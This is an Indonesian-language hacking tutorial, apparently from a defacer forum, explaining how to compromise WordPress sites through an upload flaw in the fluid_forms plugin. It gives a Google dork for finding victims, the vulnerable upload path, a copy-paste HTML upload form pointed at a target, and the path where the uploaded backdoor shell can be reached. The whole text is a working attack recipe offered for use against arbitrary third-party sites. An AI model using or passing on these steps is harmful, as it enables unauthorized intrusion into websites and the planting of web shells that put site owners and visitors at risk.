Dork: inurl:fluid_forms (kembangin lagi)
Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/
- dorking di gugel
- pilih site yang menurut lo vuln
- masukin exploitnya (contoh: site.co.li jadi site.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/)
- kalo udah masukin csrf nya
- upload deh shell backdoor lo
Shell Akses: /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php
Nih copas csrfnya
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Save dalam format html dan ubah target.co.li dengan site target lo
